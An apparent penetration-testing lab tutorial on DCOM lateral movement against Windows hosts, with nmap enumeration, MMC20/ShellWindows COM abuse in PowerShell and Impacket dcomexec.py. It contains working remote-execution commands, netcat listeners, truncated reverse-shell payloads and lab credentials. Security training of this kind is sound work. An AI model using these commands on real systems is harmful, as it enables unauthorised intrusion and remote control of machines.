Distributed Component Object Model (DCOM)
Distributed Component Object Model (DCOM) is a Microsoft technology for software components distributed across networked computers. It extends the Component Object Model (COM) to support communication among objects over a network. It operates on top of the remote procedure call (RPC) transport protocol based on TCP/IP for its network communications. DCOM uses Port 135 for the initial communication and dynamic ports in the range 49152-65535 for subsequent client-server interactions. Information about the identity, implementation, and configuration of each DCOM object is stored in the registry, linked to several key identifiers:
-
CLSID (Class Identifier): A unique GUID for a COM class, pointing to its implementation in the registry viaInProcServer32for DLL-based objects orLocalServer32for executable-based objects. -
ProgID (Programmatic Identifier): An optional, user-friendly name for a COM class, used as an alternative to the CLSID, though it is not unique and not always present. -
AppID (Application Identifier): Specifies configuration details for one or more COM objects within the same executable, including permissions for local and remote access.
DCOM Rights
Leveraging DCOM for lateral movement requires specific user rights and permissions. These rights ensure that users have the appropriate level of access to perform DCOM operations securely. These include general user rights such as local and network access, which enable communication with DCOM services locally and over a network. Additionally, membership in the Distributed COM Users group or the Administrators group is often required, as these groups have the necessary permissions. These settings are typically managed using the DCOM Configuration Tool (DCOMCNFG), Group Policy, or the Windows Registry.
DCOM Enumeration
Before we begin working with DCOM we must verify whether it is running on the target host, as we already know this service uses port TCP 135 for communication and dynamic ports in the range 49152-65535 for subsequent client-server interactions. We can use NMAP to scan the target and identify DCOM.
$ nmap -p135,49152-65535 10.129.229.244 -sCV -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-12 00:16 UTC
Nmap scan report for srv01.inlanefreight.local (10.129.229.244)
Host is up (0.0017s latency).
Not shown: 16376 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: SRV02, NetBIOS user: <unknown>, NetBIOS MAC: 00:0d:3a:e4:57:44 (Microsoft)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.52 seconds
Lateral Movement From Windows
Lateral movement from a Windows system can be achieved by performing several techniques with DCOM objects, here we will be implementing MMC20, ShellWindows, and ShellBrowserWindows.
MMC20.Application
The MMC20.Application object allows remote interaction with Microsoft Management Console (MMC), enabling us to execute commands and manage administrative tasks on a Windows system through its graphical user interface components.
To use this technique, first let's start listening with Netcat on our attack host:
$ nc -lnvp 8001
Listening on 0.0.0.0 8001
SRV01 using Helen's credentials.
$ xfreerdp /u:Helen /p:'RedRiot88' /d:inlanefreight.local /v:10.129.229.244 /dynamic-resolution /drive:.,linux
Now, we must create an instance of the MMC20.Application object. This is done using PowerShell to interact with COM objects. Here's the command we use:
PS C:\Tools\> $mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.20.0.52"));
We create an instance of the MMC20.Application COM object on our target server SRV02 using PowerShell. We declare a variable $mmc to store this instance and use the .NET Activator class's CreateInstance method to initialize it. The GetTypeFromProgID method retrieves the type information for the MMC20.Application based on its ProgID, "MMC20.Application", from the remote server at 172.20.0.52.
Next, we can utilize the ExecuteShellCommand function within the Document.ActiveView property. Microsoft documentation defines the method as follows:
View.ExecuteShellCommand( _
ByVal Command As String, _
ByVal Directory As String, _
ByVal Parameters As String, _
ByVal WindowState As String _
)
In order to use it, we must complete all parameters. The first is the Command to execute, which will be powershell.exe, next we set the Directory to $null, 3rd we add PowerShell's parameters with our reverse shell payload, we will use a payload from https://www.revshells.com, and finally we set the WindowState to 0 so it will execute normally:
PS C:\Tools\> $mmc.Document.ActiveView.ExecuteShellCommand("powershell.exe",$null,"-e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==",0)
After execution, we would have successfully established a reverse shell connection:
$ nc -lnvp 8001
listening on [any] 8001 ...
connect to [10.10.14.207] from (UNKNOWN) [10.129.229.245] 58400
PS C:\Windows\system32> whoami
inlanefreight\helen
Execution of mmc.exe through COM is highly unusual, making it difficult to mask this technique as benign activity and likely to trigger alerts for defenders, but that will depend on the maturity of the organization.
ShellWindows & ShellBrowserWindow
ShellWindows and ShellBrowserWindow objects in DCOM are very similar, they facilitate remote interaction with Windows Explorer instances. ShellWindows allows enumeration and control of open windows, enabling operations such as accessing files and executing commands within the Windows shell environment. However, ShellBrowserWindow provides specific control over browser windows within Windows Explorer, offering capabilities for managing file operations and executing commands remotely.
Since these objects aren't associated with a ProgID, we must employ the Type.GetTypeFromCLSID method in .NET along with Activator.CreateInstance to create an instance of the object via its CLSID on a remote host. We can find the CLSID with the following script:
PS C:\Tools> Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID' | ForEach-Object{Get-ItemProperty -Path $_.PSPath | Where-Object {$_.'(default)' -eq 'ShellWindows'} | Select-Object -ExpandProperty PSChildName}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
We won't be able to use this technique in this lab because it doesn't have all the required components. However, if we find a server where those components exist, we can use this method to perform remote code execution. This technique involves instantiating the ShellWindows object.
PS C:\Tools> $shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","SRV02"))
PS C:\Tools\> $shell = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","172.20.0.52"))
Now, let's start listening with Netcat:
$ nc -lnvp 8080
Listening on 0.0.0.0 8080
After that, we can execute any command using the ShellExecute method of the Document.Application property. We will use cmd.exe to execute our payload. We will be using a PowerShell reverse shell payload from revshells.com:
PS C:\Tools\> $shell[0].Document.Application.ShellExecute("cmd.exe","/c powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==","C:\Windows\System32",$null,0)
Finally, we can confirm that we have successfully established a reverse shell connection:
Connection received on 172.20.0.52 50105
PS C:\Windows\system32> hostname
SRV02
Lateral Movement From Linux
To perform DCOM lateral movement from Linux systems we must use the Impacket toolset which is a suite of Python libraries designed for interacting with network protocols. In this section, we will be using dcomexec.py.
dcomexec.py
dcomexec.py from Impacket provides an interactive shell on a remote Windows host, similar to wmiexec.py, but utilizes different DCOM endpoints for command execution. It operates over TCP port 445, retrieving output via the ADMIN$ share. This tool supports DCOM objects like MMC20.Application, ShellWindows, and ShellBrowserWindow, offering alternative remote execution methods.
We can leverage dcomexec.py to connect to a remote host and get code execution. Let's start a listener with Netcat:
$ nc -lnvp 8080
Listening on 0.0.0.0 8080
Now, we will use the user Josias and the password Jonny25 to connect to SRV02, this user is a member of the Distributed COM Users which have the necessary permissions to execute dcomexec.py, we must specify the DCOM object we wish to use with -object, for this example, we will be using MMC20, after that we must specify the domain, user, and password along with the target IP address, <domain>/<user>:<password>@<ip>, finally, we can pass our payload:
We will be using a PowerShell reverse shell payload from revshells.com.
$ proxychains4 -q python3 dcomexec.py -object MMC20 INLANEFREIGHT/Josias:Jonny25@172.20.0.52 "powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==" -silentcommand
Note: In case the TCP port 445 is not available, we can use the option -no-output. This will disable the output and it won't try to use port 445 for connections.
As we can see, we have successfully gained access to system:
$ nc -lnvp 8001
listening on [any] 8001 ...
connect to [10.10.14.207] from (UNKNOWN) [10.129.229.245] 49869
PS C:\windows\system32> whoami
inlanefreight\josias
Note: Alternatively, dcomexec.py also supports ShellWindows & ShellBrowserWindow objects; we can substitute MMC20 and if those are enabled, it will allow us to perform code execution.
Conclusion
DCOM provides powerful capabilities for remote interaction and command execution in Windows environments, significantly aiding lateral movement. By utilizing DCOM objects like ShellWindows and ShellBrowserWindow, we can gain control over Windows Explorer instances and perform actions such as file manipulation and command execution. The MMC20.Application object further allows command execution via Microsoft Management Console (MMC), enhancing remote administrative capabilities. Knowing these methods and techniques can be very helpful to improve our penetration testing assignments.